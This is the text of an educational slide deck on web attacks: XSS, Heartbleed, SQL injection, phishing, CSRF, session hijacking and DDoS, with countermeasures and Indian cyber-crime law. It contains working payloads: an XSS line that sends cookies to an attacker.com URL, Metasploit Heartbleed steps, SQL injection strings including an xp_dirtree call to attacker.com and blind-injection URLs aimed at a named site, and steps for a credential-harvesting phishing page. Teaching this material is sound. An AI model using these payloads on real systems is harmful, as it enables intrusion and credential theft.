This document discusses the Heartbleed vulnerability in OpenSSL and its potential impacts. Heartbleed is a bug in the OpenSSL cryptography library that exposes the contents of the server's memory, including private keys and user session cookies. An attacker can exploit Heartbleed to steal sensitive data from vulnerable servers or impersonate services. The vulnerability had widespread implications because OpenSSL is used to secure a majority of websites. While patching servers and changing passwords addressed direct theft of information, Heartbleed also weakened the security of encrypted communications and online identities.

2. CURRENT
TECHNOLOGIES

4. Static Websites
• Quick to develop
• Easy to host
• More secure
• Less easily hackable
• Requires web development
expertise to update site
• Site not as useful to the user
• Content can get stagnant
Dynamic Websites
• Slower/Expensive to develop
• Hosting Costs a little more
• Less Secure
• Prone to hacking
• Much more functionalities
• Easy to update
• New content brings people back
to the site and helps in the
search engines
• Can work as a system to allow
staff or users to collaborate
Types of Websites

5. DYNAMIC
WEBSITE
S

6. WEBSITE BASE

8. Website Technologies
• Markup Languages
HTML
CSS
XML
• Programming and Scripting Languages
JavaScript
VBScript
Php
C#
Perl
Asp.net
• Web Servers
Internet Information Services
(IIS)
Apache
• Databases
SQL Server
MYSQL

9. Ever come across a screen like
this??

15. URL HIJACKING
Make money
from your
mistake
They buy badly
spell domain
Redirect
from the
famous
URLs
Fake website
or phishing
site
Infect with a drive
by download

16. Display
Hijacking
Paid
Search
Hijacking
Types of URL
hijacking

17. CLICKJACKING
iframe
Z-
index
Opacity
Position

18. STROKEJACKING
It is extremely similar to clickjacking, in that a
malicious site has a user doing things they don’t
want to do. Except, this time, it’s with the keyboard
instead of the mouse – hence
the “stroke”. The attacking site gets the user to type
(or cut and paste), the information they’re looking for.
This could lead to another attack (if the user types
JavaScript), or just gathering a username and
password. The user thinks they are logging into a
site, but they’re really sending characters over to the
attacker’s site.
TAPJACKING
• A hacking technique where a malicious application
presents an unreal user interface in order to obtain user
events for a hidden action in the background.
• Like Clickjacking on the web, Tap Jacking occurs when a
malicious application displays a fake user interface that
seems like it can be interacted with, but actually passes
interaction events such as finger taps to a hidden user
interface behind it.
• Mostly the tap jacking technique is used for mobile
application and mobile websites

21. Tools and Techniques Required to Perform Attacks
 WHOIS
 Robots.txt files
 HTTrack-clone a website
 BeEF Tool
 Electronic Data Gathering, Analysis and Retrieval (EDGAR)
 Shodan Search
 Google Hacking
 DNS Lookup
 Nslookup
 DIG (Domain information Groper)
 Netcraft
 Httprint
 Fierce
 Encoder and Decoder

22. OPEN
SOURCE
TOOLS

23. Commercial
TOOLS

24. XSS

25. Content
 Definition
 Types
 Process
 Live Attack
 Risks
 Counter Measures

26. Definition
 Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications.
 XSS enables attackers to inject client-side scripts into web pages
viewed by other users.
 A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy.

27. XSS Types
 Persistent (Stored)
Stored or Persistent XSS is a kind of XSS vulnerability where the
untrusted user input is processed and stored by the server in a file
or database without any validation and this untrusted data is fetched
from the storage and is reflected back in response without encoding
or escaping resulting in permanent code execution at the browser
whenever the stored data is reflected in the response.
- link in other website or email

28. XSS Types
 Non Persistent (Reflected)
Reflected or Non-Persistent XSS is a kind of XSS vulnerability where
the untrusted user input is immediately processed by the server
without any validation and is reflected back in the response without
encoding or escaping resulting in code execution at the browser.
- forum, bulletin board, feedback form

29. XSS Types
 Local (DOM based)
DOM Based XSS is a form of client side XSS which occurs in an
environment where the source of the data is in the DOM, the sink is
also in the DOM, and the data flow never leaves the browser. It
occurs when an untrusted data is given at the source is executed as
a result of modifying the DOM “environment” in the browser. DOM
XSS occurs when the untrusted data is not in escaped or encoded
form with respect to the context.
- PDF Adobe Reader, Flash Player

30. Process

31. Screenshot
1)An attacker finds an xss hole in a web application

32. 2) The attacker creates an attack URL for stealing sensitive
Information and disguises it so that it appears legitimate.
Here it is, <script> document.location =
”http://localhost/attacker.com/redirect.php?a=” + document.cookie</script>
3) The attacker distributes the malicious XSS link via social engineering to
unsuspected users.

33. Screenshot
4) When the victim logs in, Javascript embedded with the
malicious XSS link executes and transmits the victim’s login
information to the attacker.

35. XSS Risks
XSS can
1) Steal Cookies
- Hijack of user’s session - Unauthorized acess
2)Spy on what you do
3)Modify the content of web page by
- Inserting images or words - Misinforming - Spreading Bad
Reputation
4)Network Mapping
5)XSS viruses

36. XSS Countermeasures
1) Content Filtering:
“The application may attempt to detect and remove all scripts from un-
trusted HTML before sending it to the browser.” Content filtering is
otherwise known as sanitization. This defense technique uses filter
functions to remove potentially malicious data or instructions from user
input. Filter functions are applied after user input is read by a web
application, but before the input is employed in a operation or output to the
web browser. Removal of scripts from un-trusted content is a difficult
problem for web applications that permit HTML markup in user input such
as blog. To be completely effective in eliminating XSS, a filter function must
necessarily model the full range of parsing behaviors pertaining to script
execution for several browsers.

37. XSS Countermeasures
Challenges of Content Filtering:
Allowing all benign HTML user input, while simultaneously blocking
all potentially harmful scripts in the un-trusted output. Every control
character that can be used to introduce attack code also has a
legitimate use in some benign, non-script context. For example, the ' < '
character needs to be present in hyperlinks and text formatting, and the
' " ' character needs to be present in generic text content. Both are
legitimate and allowed user inputs, but can be abused to mount XSS
attacks. Browser behavior vary from browser to browser, they are
complex to model, not entirely understood and not all known (especially
for closed source browsers like Microsoft internet explorer). Therefore,
from a web application perspective, the task of implementing correct
and complete content filter functions is very difficult, if not impossible.

38. XSS Countermeasures
2) Browser Collaboration:
“The application may collaborate with the browser by indicating which
scripts in the web page are authorized, leaving the browser to
ensure the authorization policy is upheld.” Robust prevention of XSS
attacks can be achieved if web browsers are made capable of
distinguishing authorized from unauthorized scripts.
This approach can be implemented by
(a) creating a server–browser collaboration protocol to communicate
the set of authorized scripts, then
(b) modifying the browser to understand this protocol and enforce a
policy denying unauthorized script execution.

39. XSS Countermeasures
Challenges of Browser Collaboration:
Although this defense strategy is compelling and effective long term
solution, but its implementation will take long time because web
applications adopting this approach require their users to employ
modified browsers for protection from XSS attacks. To implement this
there must be agreement on some standards for server browser
collaboration, then these new standards must be incorporated in the
normal browser implementation. This is a long, complicated process
that can take several years.
Ex: Browser-Enforced Embedded Policies (BEEP)

40. HEARTBLEE
D

41. Heartbleed is a security bug in
the OpenSSL cryptography
library.

42. OpenSSL is a software library to be used in applications that need to secure
communications over computer networks against eavesdropping or need to
ascertain the identity of the party at the other end.
It has found wide use in internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS
protocols.

44. The Secure Sockets Layer (SSL) and Transport
Layer Security (TLS) is the most widely deployed
security protocol used today. It is essentially a
protocol that provides a secure channel between
two machines operating over the Internet or an
internal network.

45. What happened..??
 Vulnerability Heartbleed was announced to the world on
7th April 2014, as OpenSSL vulnerability and with a new
code release ( 1.0.1g)
 It was found by Google security Team and
Condenomicon
 Told that Private keys to SSL certificates could be
exposed
 Many Big name companies were vulnerable; Big tech
names, Banks, law enforcement, Intelligence Agencies
 But...

46. What is heartbeat extension?
 Heartbeat is an echo functionality where either side
(client or server) requests that a number of bytes of data
that it sends to the other side be echoed back.
 The idea appears to be that this can be used as a keep-
alive feature, with the echo functionality presumably
meant to allow verifying that both ends continue to
correctly handle encryption and decryption

48. Background
The Heartbleed vulnerability is possibly the worst thing that ever happened
to online trust. Ironically, Heartbleed makes HTTPS less secure than plain
HTTP because attackers can obtain sensitive data without even having to
intercept traffic.
Initial reactions focused on :
• patching vulnerable web servers,
• revoking SSL certificates
• changing user passwords.
It took a couple more days to realize that Heartbleed also affects client
software, non-web SSL traffic and countless embedded devices which
will never receive a software update.

49. Lets see how to perform this attack with
Metasploit..!!

50.  It can be performed with powerful exploit
framework, Metasploit
 We'll see how it's performed step by step
 Step 1: Update Metasploit using msfupdate
 Step 2: Start metasploit
 Kali > msfconsole

51. Metasploit startup screen

52.  Step 3 : Find Heartbleed
 search heartbleed
 This would bring up two modules
 auxiliary/scanner/ssl/openssl_heartbleed
 and
 auxiliary.server/openssl_heartbeat_client_me
mory
 We'll use first one

53. Step 3 screenshot

54. Step 4
 Use Auxiliary module
 use auxiliary/scanner/ssl/openssl_heartbleed
 This will load the heartbleed module

55. info
 Type
msf > info
 This reveals the options that need to set in order to use this module
and a description of the module

57. Step 5
 Set options
 Although this module has numerous option, the critical one is
RHOSTS
 Let's set it to a target website on network that is still vulnerable to
heartbleed
 msf > set RHOSTS 192.168.1.169

58. Step 5

59. Step 6 : Run the module
 Finally, set the option 'verbos' to 'true'. This will provide us with
verbos output.
Msf > set verbos true
 And lets run it
msf > run
 As we can see in next screenshot , the server leaked about 64k
bytes of what was in it's memory

60. Success..!!

61. Let Us Define….
• Alice, Bob: Users of online services.
• Eve: A passive attacker (eavesdropper).
• Trudy: An active attacker who may exploit the
Heartbleed bug by sending specially crafted heartbeat
packets over an SSL (e.g.HTTPS) connection.
• yuri.com: A web site with vulnerable SSL software.
Since OpenSSL is so widely used, any web site should be
considered as a potential yuri.com until proven otherwise.

62. Attack patterns and
countermeasures

63. 1 Extraction of sensitive data from vulnerable HTTPS
servers
In this scenario Alice enters or consults sensitive data on
yuri.com over HTTPS. Plain-text data linger in the memory
of the web server. Later, Trudy connects as a regular
HTTPS clients and exploits Heartbleed.
Countermeasures for end users
• Do not exchange sensitive information with a web site
until they tell you they have dealt with Heartbleed.
Field reports
• Canadian charged in 'Heartbleed' attack on tax agency.

64. 2. Session hijacking from vulnerable HTTPS servers
In this scenario Trudy extracts session cookies rather than
login credentials. This allows her to take control of Alice's
account without waiting for her to enter her credentials.
Countermeasures for end users
• Log out of online services until they have dealt with
Heartbleed.

65. 3. Extraction of SSL private keys from vulnerable
HTTPS servers
In this scenario Trudy extracts the SSL/TLS private key of
yuri.com. Regardless of what happens next, leakage of
private keys is always a major failure.
Lessons learned
• Protect private keys with a hardware security module.
Field reports
• Confirmed: Heartbleed Exposes Web Server's Private
SSL Keys

66. 5. Tor traffic correlation
Eve, an evil dictator, wants to establish that Alice is using
Tor to communicate with george.com, a foreign human-
rights organization. Eve can spy on all Internet traffic
within her national boundaries but has no wiretapping
authority in other countries. She exploits Heartbleed
massively against vulnerable Tor exit nodes in order to
match outgoing traffic with her local intercepts.

67. 4. Man-in-the-middle impersonation of online
services
In this scenario mallory.com impersonates yuri.com after
extracting its SSL private key. This so-called man-in-the-
middle attack (MITM) is more dangerous than passive
snooping because mallory.com can trick Alice into using a
compromised certificate. It also allows mallory.com to
defeat some multi-factor security measures.
Countermeasures for end users
• Check whether your browser detects revoked
certificates.
• If it does not, inspect certificates manually.
Lessons learned
• Heartbleed will probably be the end of the current
certificate revocation infrastructure.

68. 6. De-anonymization of hidden servers and users by
malicious Tor nodes
Trudy sets up a number of malicious Tor guard node. She
exploits the Heartbleed vulnerability against clients that
connects to them, including Tor hidden servers and their
users. Although Tor hidden services are encrypted end-to-
end, Trudy can identify vulnerable users and servers
based on plaintext data leaked by Heartbleed at each end.
Besides, if she extracts the private key of a hidden
service, she can impersonate it.
Field reports
• "Tor hidden services might leak their long-term hidden
service identity keys to their guard relays."

69. 7. Attacks against VPN servers
Alice is aware that most public WiFi networks provide no
privacy. Therefore she has configured her smartphone
and laptop to connect to the Internet through a VPN
service provider, yuri.com. (Alternatively, she could be
running her own VPN server at home, or using the VPN
feature that comes bundled with her DSL modem or her
NAS box.) Eve snoops on the WiFi network that Alice is
currently using, notices SSL-based VPN traffic from her
smartphone, exploits Heartbleed against the destination
IP address, and retrieves either VPN keys or plaintext
traffic.
Field reports
• Attackers Exploit the Heartbleed OpenSSL Vulnerability
to Circumvent Multi-factor Authentication on VPNs
• OpenVPN uses OpenSSL as its crypto library by default
and thus is affected

70. Some General
Countermeasures
 Do not use OpenSSL 1.0.1f.
 Disable heartbeat extension.
 Change login credentials if your site is compromised.

71. DANGER :
OpenSSL, an open source project staffed by only 10
individuals and run on a limited budget, is used to secure
millions of servers, ensuring the integrity of email, e-
commerce, online banking and other properties, in many
cases for multi-billion dollar companies.
Heartbleed obviously has wide-reaching implications, not
only for the integrity of the Web, but also for mobile apps –
but how much damage did it actually do prior to its
discovery and patching?

72. How damaging is Heartbleed?

73. The issue has also spread to mobile devices. Android
apps, for instance, may connect to servers that could be
affected by Heartbleed. While not dedicated browsing
tools such as Google Chrome or Apple Safari, some of
these apps have their own internal browsers, blurring the
line between mobile software and the Web. That risk is
worth noting, not just for the OpenSSL exploit but for
future considerations about overall Internet security.

74. Lookingahead …

75. These weaknesses are all addressable, and the
speed with which companies and security experts
have acted has been encouraging. Still, the
community will have to stay on its toes to protect the
emerging Internet of Everything from OpenSSL and
future bugs.

76. SQL Injection Attack

77. What is SQL?
SQL (Structures Query Language) is a programming language to manage
database.
The managements systems that employ SQL are Microsoft SQL
Database, Oracle, MySQL, PostgreSQL, and others.

78. What is SQL Injection
SQL injection i.e. SQLI refers to the injection attack in which the attacker
executes malicious SQL queries that control a web application database
server
The attacker can use SQL injection to :
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server

79. Classification of SQL injections
There are 3 major classifications:
1. In-band SQLi (Classic SQLi)
2. Inferential SQLi (Blind SQLi)
3. Out-of-band SQLi

80. In-Band SQLi Or Classic Attacks
Most attacks rely on basic SQL manipulation and are considered
to be classic attacks. It includes
 WHERE clause modification
 UNION operator injection
 query stacking

81. WHERE Clause Manipulation: Any user input generally end up in
a WHERE Clause of the data base
Example:
In a login page where username is entered the SQL query looks like this:
 SELECT * FROM users WHERE name = '" + userName + "';
 if the "userName" variable is crafted in a specific way,the SQL
statement may do more than the code author intended.setting the
"userName" variable as:
' OR '1'='1
 or using comments to even block the rest of the query
' OR '1'='1' –
These user inputs renders the SQL Query like the following
 SELECT * FROM users WHERE name = '' OR '1'='1';
 SELECT * FROM users WHERE name = '' OR '1'='1' -- ';

83. SQL injection Using UNION: The UNION operator allows the
attacker to
extract sensitive information from the database.
 Example:
USER INPUT:
 ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a
GENERATED QUERY:
 SELECT id, name, description FROM products WHERE category = ''
AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a‘
The crafted query returns usernames and passwords of all
members in the database.

84.  Query stacking:Stacked queries provide a lot of control to the
attacker. By terminating the original query and adding a new one, it
will be possible to modify data and call stored procedures.
 Example
A classic attack using this technique could look like the following.
MALICIOUS USER INPUT:
 1; DELETE FROM products
GENERATED QUERY WITH MULTIPLE STATEMENTS:
 SELECT * FROM products WHERE productid=1;
DELETE FROM products

85. Inference SQLi attack
The main intent of the attacker in an inference SQLi is identifying the
injectable parameters, extracting database schema.
Here no data is actually transferred via the web application and the
attacker would not be able to see the result of an attack in-band. It is
also referred as Blind injection attack
There are two well-known attack techniques that are based on
inference:
 Boolean-Based-Blind Injection
 Time-based-blind Attacks

86. Boolean-based-Blind Injection: Information is inferred from the behaviour
of the page by asking the server true/-false questions. If the injected statement
evaluates to true, the site continues to function normally. If the statement
evaluates to false, although there is no descriptive error message, the page
differs significantly from the normally-functioning page.
Example:
In this website it shows some information which is stored in some database
http://www.psn.com.pk/index.php?page=gallery.php&id=519
The attacker finds the vulnerability using Boolean based blind injection
False query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2
True query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1

89. Timed-based-blind attack: For Time-based attacks, the attacker
needs to instruct the database to perform a time-intensive operation. If
the web site does not return a response immediately, the web
application is vulnerable to Blind SQL Injection. A popular time intensive
operation is the sleep operation.
Example:
In the website
http://www.psn.com.pk/index.php?page=gallery.php&id=519
To perform time based blind attack the query will become:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1,
sleep(10), false)

91. Out-of-band SQLi
 Out-of-band attack occurs when the attacker is unable to the same
channel to attack and gather result
 Out-of-band techniques, offer an attacker an alternative to inferential
time-based techniques, especially if the server responses are not very
stable.
Consider the following URL crafted by an attacker:
https://example.com/products.aspx?id=1;EXECmaster..xp_dirtree
'test.attacker.com' –
This will produce the following SQL query.
 SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree
'test.attacker.com' --

92.  What happened is that there are now two separated queries that
SQL Server will execute.
/* First Query */
 SELECT * FROM products WHERE id=1
/* Second Query */
 EXEC master..xp_dirtree 'test.attacker.com' –
 The second query is invoking a stored procedure xp_dirtree. This
extended stored procedure can be used to get a list of all the folders
for the folder named in the xp.

93. screenshots

94. Recording of SQL attack

95. SQL Injection (SQLi)
SQL INJECTION (SQLI) REFERS TO AN INJECTION ATTACK WHEREIN AN ATTACKER
CAN EXECUTE MALICIOUS SQL STATEMENTS (ALSO COMMONLY REFERRED TO AS A
MALICIOUS PAYLOAD) THAT CONTROL A WEB APPLICATION’S DATABASE SERVER
(ALSO COMMONLY REFERRED TO AS A RELATIONAL DATABASE MANAGEMENT
SYSTEM – RDBMS).

96. How SQL Injection works
 SELECT id FROM users WHERE username=’username’ AND
password=’password’ OR 1=1’
 # Define POST variables
 uname = request.POST['username']
 passwd = request.POST['password’]
 # SQL query vulnerable to SQLi
 sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND
password=’” + passwd + “’”
 # Execute the SQL statement
 database.execute(sql)

97. What’s the worst an attacker can do with
SQL?
 bypass authentication or even impersonate specific users.
 allow the complete disclosure of data residing on a database server.
 data affects data integrity and could cause repudiation issues, for instance, issues
such as voiding transactions, altering balances and other records.
 to delete records from a database
 to allow arbitrary execution of operating system commands on the database server

98. What is a SQL Injection Vulnerability?
 Non-Technical Explanation
 Drive through <route> and <where should the bus stop?> if <when should the
bus stop?>.
 Drive through route 66 and stop on bus stops if there are people on the bus
stops.
 Drive through route 66 and do not stop on bus stops and ignore the rest of this
form. if there are people on the bus stop.

99. What is a SQL Injection
Vulnerability?
 Technical Explanation
 $statement = "SELECT * FROM users WHERE username = 'bob' AND password =
'mysecretpw’”
 $statement = "SELECT * FROM users WHERE username = '$user' AND password =
'$password'";

100. Different Types of the SQL Injection
Vulnerability
 Error based SQL Injection
 Boolean Based SQL Injection
 Time based SQL Injection
 Out-of-Band SQL Injection Vulnerability

101. Impacts of the SQL Injection
Vulnerability
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server

102. Preventing SQL Injection Vulnerabilities
 Server side scripting languages are not able to determine whether
or not the SQL query string is malformed; all they can do is send a
string to the database server and wait for the interpreted response
 when developing web applications you should use prepared
statements to prevent SQL injections. When using prepared
statements the structure and data are separated and can be
interpreted by the sql server without risking that an attacker is able
to change the structure of the SQL query for malicious purposes

103. What Can Be Done to Prevent SQL
Injection Attacks?
 sanitization
 validation

104. Sanitization
 Sanitization usually involves running any submitted data through a
function (such as MySQL's mysql_real_escape_string() function) to
ensure that any dangerous characters (like " ' ") are not passed to a SQL
query in data.

105. Validation
 attempts to ensure that the data submitted is in the form that is
expected. At the most basic level this includes ensuring that e-mail
addresses contain an "@" sign, that only digits are supplied when
integer data is expected, and that the length of a piece of data
submitted is not longer than the maximum expected length
Two ways:
 by blacklisting dangerous or unwanted characters (although
hackers can often get around blacklists)
 by whitelisting only those characters that are allowed in a given
circumstance, which can involve more work on the part of the
programmer

106. Others way of prevention
 Trust no-one
 Don't use dynamic SQL when it can be avoid
 Firewall
 Update and patch
 Reduce your attack surface
 Use appropriate privileges
 Keep your secrets secret
 Don't divulge more information than you need it

107. Phishing

108. Phreaking + Fishing = Phishing
{Phreaking = making phone calls for free back in 70’s}
Phishing is the act of sending an email to a user falsely claiming to be an
established legitimate enterprise in an attempt to scam the user into
surrendering private information that will be used for identity theft.
What is Phishing ?

109. Target By Sector

110. PhiShing

111.  Spear Phishing
 Clone Phishing
 Whaling
___________________________________________________________
Spear Phishing
Phishing attempts directed at specific individuals or companies have been
termed spear phishing. Attackers may gather personal information about their
target to increase their probability of success. This technique is by far the
most successful on the internet today, accounting for 91% of attacks.
Phishing Types

112. Clone Phishing
A type of phishing attack where a legitimate, email containing an attachment or link has
had its content and recipient address taken and used to create an almost identical or
cloned email. The attachment or Link within the email is replaced with a malicious
version and then sent from an email address spoofed to appear to come from the
original sender. It may claim to be a re-send of the original or an updated version to
the original.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and
other high profile targets within businesses, and the term whaling has been coined for
these kinds of attacks.

113. Place your screenshot here
Step: 1
Setting Up A Web
Page Which
Looks Similar To
The Original
One.
Link :
http://a0145877.xs
ph.ru/
HERE’S HOW IT’S DONE

114. Place your screenshot here
Step: 2
A php script which
stores credentials
to a file is what
required to
harvest
credentials

115. Place your screenshot here
Step: 3
In the html page
search for submit
form and change
it to written php
script

116. STEP: 4 Host it in a server & Share The Link

118. 118

119. 119

120. PHISHING
DON’T GET
HOOKED

121. It is the attempt to obtain sensitive information
such as usernames, passwords, and credit card
details, often for malicious reasons, by disguising
as a trustworthy entity in an electronic
communication.
DEFINITION
TYPES OF PHISHING
• Spear phishing
• Clone phishing
• Whaling
• Filter evasion
• Link manipulation
• Tabnabbing

125. 1. Be wary of emails asking for confidential information
2. Make sure you familiarise yourself with a website's privacy
policy
3. Watch out for generic-looking requests for information.
4. Never submit confidential information via forms embedded
within email messages.
5. Never use links in an email to connect to a website unless you
are absolutely sure they are authentic. Instead, open a new
browser window and type the URL directly into the address bar
6. Make sure you maintain effective software to combat phishing
How to protect yourself

126. PHISHING COUNTERMEASURES IN
DETAIL

127. Auto-Generate Domain-Specific
Password
Hashing of passwords with a secret key along with
website domain name.

128. Auto-Generate Domain-Specific
Password
Due to this mechanism, it becomes really
hard for the attacker to get the password.

129. Auto-Generate Domain-Specific
Password
Disadvantage
• Practical implementation is quite difficult.
• Many banks use multiple domains and sub-
domains
• It’s a static solution

130. Web Browser’s PWD Database
Random passwords are generated and stored in the browsers.
It is more “secure,” as the browser will only give the credentials to the
right URL. If anything changes in the URL, it won’t pass credentials
Disadvantage-
•It doesn’t work fully with sub-domains.
•Even here, passwords are stored in plain text.

131. Phishing Scam Alert Add-
ons/Extensions
The concept is like this. If server visits any known
fake/phishing URL, then that tool bar turns red.

132. Phishing Scam Alert Add-
ons/Extensions
If that phishing or fake site is the one suspect site, then it turns
yellow.

133. 2FA—Two-Factor Authentication
It requires not only a username and password, but also some piece
of information that only the user knows (physical token).

134. Encrypted Key Exchange Process—Prevent
Dictionary Attacks
Series of protocols are implemented for encrypted key
exchange.
This key is generated by combining the shared password.
This process takes place in such a way that the phisher
can’t guess it.
These protocols were awkward to implement and use and
they were also too time-consuming.

135. Educating Your People
Conducting seminars and workshops on ethical hacking and
Internet security in order to educate their employees.
This can be a quality step towards security awareness.
Logical awareness has to be raised.

136. CSRF

137. Content
 Definition
 Attack Process
 Screenshots
 CounterMeasures
 Tools
 References

138. Definition
 Cross-Site Request Forgery (CSRF) is an attack that forces an
end user to execute unwanted actions on a web application in
which they're currently authenticated.
 CSRF attacks specifically target state-changing requests, not
theft of data, since the attacker has no way to see the response
to the forged request.

139. Definition Cont...
 With a little help of social engineering (such as sending a link via email
or chat), an attacker may trick the users of a web application into
executing actions of the attacker's choosing.
 If the victim is a normal user, a successful CSRF attack can force the
user to perform state changing requests like transferring funds,
changing their email address, and so forth.
 If the victim is an administrative account, CSRF can compromise the
entire web application.

140. Process
 Root cause of CSRF
 Existing browsers do not check whether a client actually initiates an
HTTP request
140
Malicious
Website
Browser
Target
Website
Send login request
Send forged request with
cookies
Return login response with
cookies
Visit malicious website
Return malicious code

141. Screenshot
Step 1 − Let us perform a CSRF forgery by embedding a Java script into
an image. The snapshot of the problem is listed below.

142. Screenshot
Step 2 − Now we need to mock up the transfer into a 1x1 image and
make the victim to click on the same.

143. Screenshot
Step 3 − Upon submitting the message, the message is displayed as
highlighted below.

144. Screenshot
Step 4 − Now if the victim clicks the following URL, the transfer is
executed, which can be found intercepting the user action using burp
suite. We are able to see the transfer by spotting it in Get message as
shown below –
Step 5 − Now upon clicking refresh, the lesson completion mark is
shown.

145. Tool – OWASP CSRF Tester
Test your applications for CSRF
-Record and replay transactions
-Tune the recorded test case
-Run test case with exported HTML document
Test case alternatives
-Auto-Posting Forms
-Evil iFrame
-IMG Tag
-XMLHTTPRequest
-Link

146. Counter Measures
 Web application should insert random values, tied to the
specified user’s session, into the forms it generates
 Web application should re-authenticate every time when users
are about to perform a particularly dangerous operation

147. Counter Measures Cont..
Safe Methods
1) The GET and HEAD methods SHOULD NOT have the significance of
taking an action other than retrieval. These methods ought to be
considered "safe" ...
$_POST superglobal and not $_GET or $_REQUEST
2)Try to force the use of your own forms
- On form generation, store unique token in user $_SESSION and
form hidden field
- On submit, check token
-- Limits attack to only single user
-- Attacker would need to obtain users valid form AND session token
- Put expiry on form tokens

148. Session HIJECKING

149. What is session hijacking ?
Session hijacking is the process of exploiting valid computer session
which involves stealing the victim's cookie.

150. What is a cookie ?
• A cookie known as a web cookie or http cookie is a small piece of text
stored by the user browser.
• A cookie is sent as an header by the web server to the web browser on the
client side.
• A cookie is static and is sent back by the browser unchanged every time it
accesses the server.

151. Types of session hijacking
1 ) Active : -
In active attack, an attackers finds an active session and takes over.
2 ) Passive : -
With passive attack, an attacker hijacks a session, but sits back, and
watches and record all the traffic that is being send forth

152. Session hijacking working…

154. Showing video example of session hijacking

156. Session Hijacking
Levels of Session
Hijacking
Session Hijacking ToolsSession Hijacking Steps
CountermeasuresTypes Of Session Hijacking

157. Steps in Session Hijacking
Place yourself between the victim and the target
(you must be able to sniff the network)
Monitor the flow of packets
Predict the sequence number
Kill the connection to the victim’s machine
Take over the session
Start injecting packets to the target server

158. Types of Session Hijacking
There are two types of session hijacking attacks:
Active
• In an active attack, an attacker finds an
active session and takes over
Passive
• With passive attack, an attacker hijacks a
session, but sits back, and watches and
records all the traffic that is being sent
forth

159. Session Hijacking Levels
Session hijacking takes place at two levels:
• Network Level Hijacking
• Application level Hijacking
Network level can be defined as the interception of the packets during the
transmission between client and the server in a TCP and UDP session
Application level is about gaining control on HTTP user session by obtaining the
session ID’s

160. Some common tools used for Session
Hijacking
The following are a few that
belong to this category:
• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
• Paros HTTP Hijacker

161. Counter Measures for Session
Hijacking
Use Encryption
Use Secure protocol(SSL and
HTTPS)
Limit incoming connections
where possible
Minimize remote access
Set a time out for the expiry of
the session when inactive
Expiry of session if the agent if
browsing changes
Logout Functionality

162. Counter Measures for Session
Hijacking (Cont….)
ID creation after authoritative
login
Long session ID’s
Forcing re-authentication or set-
up authentication
Captcha prevention
Educate the employees
Expiry of session if the operating
system changes
Expiry of the session if the
device changes(Web Socket)

163. Distributed Denial
of Service

164. What is Distributed Denial of Service?
 A denial-of-service attack (DoS attack) is a cyber-attack where the
perpetrator seeks to make a machine or network resource unavailable to
its intended users by temporarily or indefinitely disrupting services of
a host connected to the Internet. Denial of service is typically
accomplished by flooding the targeted machine or resource with
superfluous requests in an attempt to overload systems and prevent some
or all legitimate requests from being fulfilled.

166. Types of DDos

167. Volume Based Attacks
 Includes UDP floods, ICMP floods, and other spoofed-packet floods. The
attack’s goal is to saturate the bandwidth of the attacked site, and
magnitude is measured in bits per second (Bps).

168. Protocol Attacks
 Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf
DDoS and more. This type of attack consumes actual server resources, or
those of intermediate communication equipment, such as firewalls and
load balancers, and is measured in Packets per second.

169. Application Layer Attacks
 Includes low-and-slow attacks, GET/POST floods, attacks that target
Apache, Windows or OpenBSD vulnerabilities and more. Comprised of
seemingly legitimate and innocent requests, the goal of these attacks is to
crash the web server, and the magnitude is measured in Requests per
second.

170. LIVE DEMO

171. Prevention and Mitigation Strategy
 The first things to do in DDoS mitigation is to identify normal conditions for
network traffic by defining “traffic patterns”, which is necessary for threat
detection and alerting. DDoS mitigation also requires identifying incoming
traffic to separate human traffic from human-like bots and hijacked web
browsers. The process is done by comparing signatures and examining
different attributes of the traffic, including IP addresses, cookie variations,
HTTP headers, and Javascript footprints.
 One technique is to pass network traffic addressed to a potential target
network through high-capacity networks with "traffic scrubbing" filters.

172. Law and Investigations

173. INVESTIGATION
Challenges in the investigation of Cyber Crime (Website Crime)
Investigation of Cyber-crimes are different from conventional
investigation as:
 Incident taking place in Virtual World
 Borderless/Transnational
 Issues of jurisdiction
 Issue of connecting the accused with the
machine/computer
 Lack of enthusiasm in reporting Cyber crime

174. The essential Requirements for Investigation are:
 Immediate Reporting of Breaches.
 Adequate Tools.
 Trained Investigators.
 Computer Literate Witness.
 Assistance of Forensic Experts.
 Immediate investigation.
Common Procedure of Web Site Crime investigation
 Who is., Domain Detail,If domain is active then it must
have working email address and payment detail,
contact registrar, Registrar can give Domain IP address
and cell number and payment instrument.
17
4

175.  Email ID used for Sell hosting server is important because
police can get email id, creation IP, alternate email ID, Cell
number, IP logs.
 An Law Enforcement Agency of the India can demands the
information like IP Logs, Login credentials of the accused for
investigation through Section 91 of CRPC 1973, for detailed
information of Section 91 of CRPC 1973 kindly refer
annexure.
 The Law Enforcement agencies can perform detailed
investigation of the Cyber Crime cases through the Internet
Protocol Data Record (IPDR) of the used network. The IPDR
can be obtained from the ISP of the concerned network. The
Sample of the IPDR is shown in figure. 17
5

176. FIGURE : Sample Of Notice under 91 Crpc 1973.

177. Figure : Sample of IPDR

178. Crimes and Laws Relating to Website.
 Harassment via fake public profile on social networking
site.
 Online Hate Community.
 Email Account Hacking.
 Web Defacement.
 Introducing Viruses, Worms, Backdoors, Rootkits, Trojans,
Bugs.
 Cyber Terrorism.
 Phishing and Email Scams.
 Theft of Confidential Information.

179. WEBSITE HACKING CASE STUDY
 Hacking and defacement of Assam police website.
 Hacker hacks into a financial website.
 Indian Army website hacked.
 ISRO Website Hack.
 Bazee.com
 E-Bay Account Takeover
 Incometaxpune.Com Redirection To Pornographic Content